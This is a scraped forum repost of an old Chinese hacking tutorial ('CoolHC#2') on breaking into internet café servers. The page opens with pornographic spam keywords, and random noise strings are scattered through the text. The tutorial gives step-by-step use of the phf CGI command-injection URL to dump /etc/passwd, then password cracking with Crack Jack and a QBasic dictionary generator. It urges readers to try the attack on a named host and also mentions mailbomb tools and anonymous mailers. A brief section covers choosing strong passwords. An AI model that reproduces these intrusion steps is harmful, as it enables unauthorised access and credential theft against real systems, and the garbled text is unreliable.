久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

      <small id="r7w9x"></small>

          <td id="r7w9x"></td><sub id="r7w9x"><menu id="r7w9x"><samp id="r7w9x"></samp></menu></sub>
        2. 

          4. <th id="r7w9x"></th>
          1. 

            汶上信息港
            
標題: 如何破解系統(tǒng)(2) [打印本頁]
            

            
作者: 雜七雜八    時間: 2011-1-12 16:25
            
標題: 如何破解系統(tǒng)(2)
            這不是一個教學(xué)文件, 只是告訴你該如何破解系統(tǒng),好讓你能夠?qū)⒆约旱南到y(tǒng)作安全的保護, 如果你能夠?qū)⑦@份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦, 我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 并不是教人 Crack Password若有人因此文件導(dǎo)致惡意入侵別人的電腦或網(wǎng)路, 本人概不負責(zé) !!; L7 W* k+ |; [0 q" N, w
            

            
+ l: a# C) O! v  }話說上次 CoolFire 講到許多的 Net Coffee 店, 安全性之差實在是沒話說,但是過了這麼久也不見有幾家改進, 可能是想讓自己的電腦被別人玩弄在股掌之間吧, 但可不是每個人都像CoolFire這樣溫和, 如果遇到的是比較狠一點的角色, 那你的 Net Coffee 可能要有一兩天只賣Coffee 而沒辦法再 Net 下去了!!
            
1 a( M% u9 L  N0 S  e8 w8 f! y8 P6 L  n7 X/ k$ v
            
繼 CoolHC#1 推出後, 有許多人是否已經(jīng)躍躍愈試了呢 ?? 這次咱們不談新的花招,用用之前所講的再來探險一番, 當(dāng)然, 這一次我照往例還是不會使用真正的 Domain Name 來作教學(xué),但是課程中的所有內(nèi)容絕對屬實, 當(dāng)然本次攻擊的對象還是.... Net Coffee Shop....# g. e3 b, H$ e2 T5 T
            

            
) M: X4 v" o3 o& a**談一下 Crack Jack 猜猜密碼
            
% @+ l8 ]2 ]7 U" D
            
# C2 N2 `4 T' d0 x- r% s; i, Q. A許多人從上一次介紹 Crack Jack 之後就應(yīng)該已經(jīng)領(lǐng)教過它的功力了,但是有幾點需要說明的, 
            
# v6 Z, }6 x6 K2 ^3 x) |, n有些人使用 Jack 來幫你尋找 password, 我就當(dāng)你已經(jīng)抓到了沒有 shadow 的 /etc/passwd, / g0 {7 u5 G& X- C3 N% C3 ~% d
            
但是為甚麼使用 Jack 還是找不到呢?? 我想你應(yīng)該要換個正點一點的字典檔了, 因為Jack 還
            
1 J2 x1 |5 |1 p, y4 R- v3 }5 i是根據(jù)你所提供的字典檔在尋找, 如果你提供的字典本身就沒有這些字,那當(dāng)然連一個小小帳號: L2 t7 q9 x! U1 p
            
的密碼你都別想猜到了. 數(shù)一下你所使用的字典檔中有多少字 ???我用的字典檔有十九萬多個: z4 O4 M4 D- R9 H8 u
            
字, 你的呢? 是不是小巫見大巫呀 ?? 那麼就趕快充實一下字典檔再重新尋找吧 !!! g$ {  S' f1 i6 w1 b
            
9 N9 P, N2 H& Y  H* X; ?" K: O
            
許多人的密碼都有一定的法則, 我自己寫了 PaSs2DiC 就是將 UserName 由passwd檔轉(zhuǎn)成字典檔的工具, 這是對一些喜歡使用 UserName 當(dāng)作 Password 的人最好的方式,但是也曾經(jīng)好運的找到別人的密碼, 真不曉得"甲"是不是暗戀"乙"才用"乙"的 ID 作為密碼的 ???你可以很簡單的使用Qbasic 來制作 "序數(shù)" 密碼, 或日期密碼, 底下簡單的作一個 0101 (一月一日) 到- u! D) a/ t' X
            
1231 的密碼
            
" {) |$ o8 q. _1 i# Q8 b檔出來:# r# R" b5 p3 i/ N. g
            
------------Cut Here MakeDate.BAS -------------------
            
! w% b; H9 k4 Q& X, d% y2 q: J! D1 }Open "Dates" for output as #1
            
! Y# H- ~* I$ }7 j$ ^2 j6 p3 k: jfor I=1 to 12. x* Q  v1 u3 U( N
            
for J=1 to 31
            
- p2 _6 Z: o& W, d$ f4 y+ ?I1$=rtrim$(ltrim$str$(I)))
            
9 K* [: T, F1 k$ p) tJ1$=rtrim$(ltrim$str$(J)))
            
1 p# {- U+ P, a' `8 eif len(I1$)=1 then I1$="0"+I1$- L0 l; Z! Y) U
            
if len(J1$)=1 then J1$="0"+J1$
            
" y5 n9 S! u& D# s0 LOut$=I1$+J1$6 v5 e: u. I& @5 f1 a) D
            
print #1,Out$ 
            
' x- |, f# P- y3 g% N; o  Bnext I% e) h9 h, n7 u- [2 Q
            
next J
            
% V3 h. t; h5 J' g0 G# }close( k: \5 V# Z3 b% Y3 _
            
------------ Cut Here End MakeDate.BAS ----------------. z1 a) j! ~) o& ]' R2 p& c
            
這支小程式將會寫一個 "DATES" 的檔案, 里面就是你要的字典, 當(dāng)然啦,這只是包含月跟日 !! ; [3 z7 p) ]8 F* \8 p; P
            
如果你要猜的密碼是含年份的, 你可能要再增加一些程式碼, 再 Run 一次試試看了,不過這是一個好的開始不是嗎 ??
            
0 B! U; d5 a7 Q1 W. D
            
  W- J. {' f& Z. j. {2 n  f2 o**如何保護自己的密碼! Z; \- D: e! s. w
            

            
1 {& `7 ?3 b1 O+ `: W, ?8 V: b9 W# g談了這麼多的密碼猜法, 當(dāng)然要談一下如何保護自己的密碼不被破解,( }3 x6 B# x0 V& s, U7 F8 _4 z6 n
            
請遵守以下的原則:  [1]不用生日作為密碼(太容易猜了啦) [2]不用序數(shù)作為密碼(除非你的序數(shù)無限大)% D& M; z0 a0 S
            
[3]不用身份證字號作為密碼(LetMeIn! 里有猜身份證字號的功能耶)
            
4 v8 y9 i0 g! V, ^8 L7 U! q[4]不用在字典中查得到的字作為密碼. ( |0 n7 ?  o1 o3 }! }
            
3 B5 f+ ]) F' [) ]4 ^
            
那麼依照上面的幾點說法, 甚麼樣子的密碼最不容易猜, 自己也最好記呢?? 答案是:用一句有意義的話來作為自己的密碼, 例如: NoOneCanCrackIt 就是一個很難猜的密碼類型,基於這個密碼猜法的原則, 你的密碼是不是要作些更新, 或是大小寫要作一些對調(diào) ?? 如果你的密碼是
            
) B- N9 u: ]! v1 g* X) p* Gcoolfire,; L! \6 K+ [$ J' t  L. _& S
            
建議你最好能改成 CoolFire 或 coolfires (加復(fù)數(shù) "s"),( e; z# a$ z9 Y+ Q) O0 o- S
            
這樣被猜中的機率就小了很多. 如果你是一個 Hacker, 你的密碼也被人猜中的話... 那...#%%^^^&@8 {9 B+ V) w, M  q$ _9 g' t
            
% A& a6 }& ~4 Q$ N
            
**正式的話題
            
5 m5 V+ o0 S4 G3 t* ]# T  P
            
% b1 K7 T8 I7 [這次的話題當(dāng)然還是 Crack, 相信許多人已經(jīng)看過 CoolHC#1 了,當(dāng)然眼尖的人可能也已經(jīng) D/L
            
' r8 I/ Q$ w  q/ }1 [System Holes 試過了, 你有成功的例子嗎 ?? 如果沒有, 這份 CoolHC#2可能就是你的強心針,1 ]" Z2 f' m# O& {0 c, b
            
因為這次談的正是 System Holes #1 成功的案例.Step 1. 連線到 "蕃薯藤" 找 "網(wǎng)路咖啡" 找到好多家網(wǎng)路咖啡的 WWW 網(wǎng)址,一一連上去試試看
            
2 ]: f+ a1 q* S4 }9 C* _$ s在 System Holes #1 中的方法可不可行./ i- y9 e# j2 }" W4 `
            
Step 2. 若可行則會傳回 /etc/passwd 資訊, 存檔後迅速 Logout, 使用 Crack Jack7 M5 d- x6 U  E
            
解讀!!1 a1 s7 {; p) Y' H
            

            
, F  f9 K; Z, Z[[實例探討]]
            
+ W! j, B4 I8 u- d5 g8 b8 k6 H+ d
            
System Holes #1 中所介紹的 WWW 入侵法是這樣子的:
            
# E5 L9 g: q" O1 n7 t2 e- E: Mhttp://www.somewhere.com/cgi-bin/nph-test-cgi?* 後再
            
8 _) c! g" M: Z& h9 q2 C" j- y2 }) Lhttp://www.somewhere.com/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd
            
0 W% ^! z- r) H2 ]3 [$ ~  R7 i/ n4 s" q  ?! B! t  I3 `/ F$ H
            
[1] 用 WWW Browser 連到 yournet.net& x( _3 ^0 v+ v
            
[2] Location 輸入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*"( {8 O: T5 j" A# B& L
            
[3] 接著如果出來一份像 Report 的畫面的話, 接著輸入0 h0 |! I4 g3 }( y; Z) `
            
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
            
( ^( _% g/ P0 R3 b+ ^[4] 發(fā)生了甚麼事?? etc/passwd 在你的瀏覽器中 "顯示" 出來了 !! 快點 Save 吧
            
6 Q. O% x! q# ^+ V, L9 D!!
            
9 Z9 d) l6 p- v  q; A3 }0 t# m1 {3 t  u$ Z7 T, e
            
這個方法所用的是系統(tǒng) "檢索" 的漏洞, 不提供這個功能,或是伺服器檢索類型不同的機器則不& M( s6 C1 D! r% K
            
會接受這樣的指令, 當(dāng)然也就逃過我們這次的模擬演練啦 !! 但是.... 相信我,你一定會找到一家脫線的網(wǎng)路咖啡, 并沒有像我們一樣每天閱讀 Mail List 的信,對系統(tǒng)安全一點研究也沒有的人不在少數(shù). http://hacker.welcome.com 就是這樣的一個 Net Coffee Shop...呵.... 快來試試吧 !! , \# L; h, F7 R: n8 d! o
            

            
3 G8 f* I1 B* e0 @3 |當(dāng) CoolFire 抓到 /etc/passwd 後, 立刻存檔, 也馬上斷線, 并且拿出 UltraEdit來瞧一下使用者的資訊, 當(dāng)然這個小 passwd 對 Crack Jack 來說, 實在是不夠看,沒幾分鐘就在我的 486 機器上顯示出來幾個以 UserName 作為 Password 的資訊 (歸功於 PaSs2DiC 及CrackJack 的功勞)不過當(dāng)我試著找尋 root 的密碼時, 一想到我那將近 20 萬字的字典檔,就想到可能花費的時間一定相當(dāng)?shù)捏@人, 於是就以 Jack 的 Option 設(shè)定只尋找 root 那一行, ...(過了良久)... 果不然又是一個笨 root. 用了 "非常" 容易猜的密碼... <--- This is JackAss... 呵!! Got It!
            
4 t3 j0 u$ l1 h: T3 T  A" z+ j- d" I+ C# z
            
如果你所使用的機器速度不是頂快, 你最好能夠到快一點的機器上使用 Crack Jack,不然你也可以將字典檔切割成幾個小檔案, 然後再分別在幾臺機器上跑, 我目前使用的配備是486DX4-13032MB RAM, 3.2GB HDD, 近 20 萬字的字典檔, 如果在分析較大的 passwd檔時我會將字典檔切割為四至五個小檔 (看有多少臺機器可跑),然後在周末下班前在公司的幾臺機器上分別執(zhí)行 Crack Jack, 等到禮拜一上班時就等著接收成果了! 當(dāng)然如果你只有一臺機器, passwd檔又很大的話,由於 Crack Jack 無法於 Windoz 95 下使用, 你可能只能犧升時間或機器來跑了!再沒有辦法的話, 亦可使用單機多工, 多開幾個 DOS Box 來跑 Brute, 也許也是一個可行的辦法!
            
4 ^. d7 z/ c; r7 v) t2 Z
            
/ U' n% J8 `8 I* Y**後語0 n8 a7 A' y5 k6 _5 [
            

            
3 z0 Q0 }( O6 y3 w; h5 `, Y$ W/ Y有許多人在使用 Crack Jack 的時候有許多問題, 不過看了 CoolHC#1 應(yīng)該都解決了吧?? 最近大家問的比較多的是 UpYours 3.0, 雖然已經(jīng)改進了 Install 的問題,不過大家的問題還是都出在Winsck.ocx 上面, 有人說裝了 MSICP Beta 會好 ?? 但也有實例裝了也還不能 Run 的,, a; U& p/ v% d) L+ I! S
            
在此建議大家不要再玩 MailBomb 了, 雖然我喜歡收集這種東西, 但還是少亂炸為妙,已經(jīng)證實有許多常用的 MailBomb 沒有辦法 Fake IP 了 !! 所以... 如果 UpYours 3.0裝不起來的人就試試 KaBoom!V3.0 吧 ! 雖然沒有辦法 Fake IP (選錯 Mail Server 的話), 但是也是一個不錯的AnonyMailer如果要發(fā)匿名信, 現(xiàn)在首頁上有可以幫你發(fā)信的 Mailer, 會安全一點. - [$ d4 |) Y8 o* M3 J8 c
            
; S& b+ x: c* K6 I  W& ~
            
如果你仍舊對 UpYours 3.0 不死心, 就試試 ResSvr32.exe (Under Windows/systemrectory),% O( |$ H0 P' a4 p7 D
            
看看能不能將 WinSck.ocx 裝上了... 記得先 UnReg 再 Reg... 
            
4 B. n! i9 ]6 d0 T3 n1 e1 l7 x" T' O- {7 o( r
            
在此建議大家可以多訂閱一些 "系統(tǒng)安全" 討論的 Mail List或多參考一些已經(jīng)被找出來的系統(tǒng)漏洞, 因為有些人對這些方面并不是很重視, 所以這些資訊也就顯得格外的重要了,如果能夠多參考一些資訊, 在你入侵的時候會有很大的幫助, 當(dāng)然, 如果你能作出一份列表出來,放在手邊參考的話, 就可以快速的; 安全的入侵了!! 下一次所談的是 SendMail 的 Bug 實例,在這中間當(dāng)然照往例會先出一份 System Holes #2 來作為資料. 如果有興趣的人在 SH#2出來的時候可以先研究看看. 下次見! Merry X'Mas..... & Happy New Year.......
            
, G# o3 ?4 k0 h
            
2 g1 o# w4 Z$ D" K* j; r8 Q------0 @% C" _  ~; P% z% ~; S3 b
            
上次講的 Home Page 建置案還沒搞完, 沒有充實一下 Home Page 實在是對不起大家,所以利用一點時間寫了 CoolHC#2, 可能報告又交不出來了 !! 老話,如果你有興趣寫其它程式的中文說明, 請完成後寄一份給我, 我將它放在 Home Page 上面讓其它人參考,當(dāng)然你也可以給我你的使用心得, 讓別人參考看看也行! 目前準備收集一系列的 System Hole List,如果你在其它的站臺有看到的, 請把它先 Cut 下來, Mail 一份給我 ! 
            
" ~, I4 V+ C4 v$ O4 H' k  H# o# ^: w0 z
            
------
            
6 B' C& z$ X6 n/ @: p1 Z再次重申, Crack 別人站臺之後不要破壞別人站臺中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機.... (高-Net 還是除外)... 請勿將這類技術(shù)使用於破壞上 (又...如果第三次世界大戰(zhàn)開打, 你可以任意破壞敵國的電腦網(wǎng)路... 我全力支持),最嚴重的情況(如果你真的很討厭該主機的話)... 就將它 Shut Down.... 好了! 別太暴力了!, |! `- M$ b' P6 C- ?+ ^
            
# O& e# B, W& U) B* y) j/ C+ b7 o) I, [8 i
            
                             # g, n" D* B$ B  s2 p$ ~
            





            

            

            歡迎光臨 汶上信息港 (http://m.junkejituan.com/)

Powered by Discuz! X3.5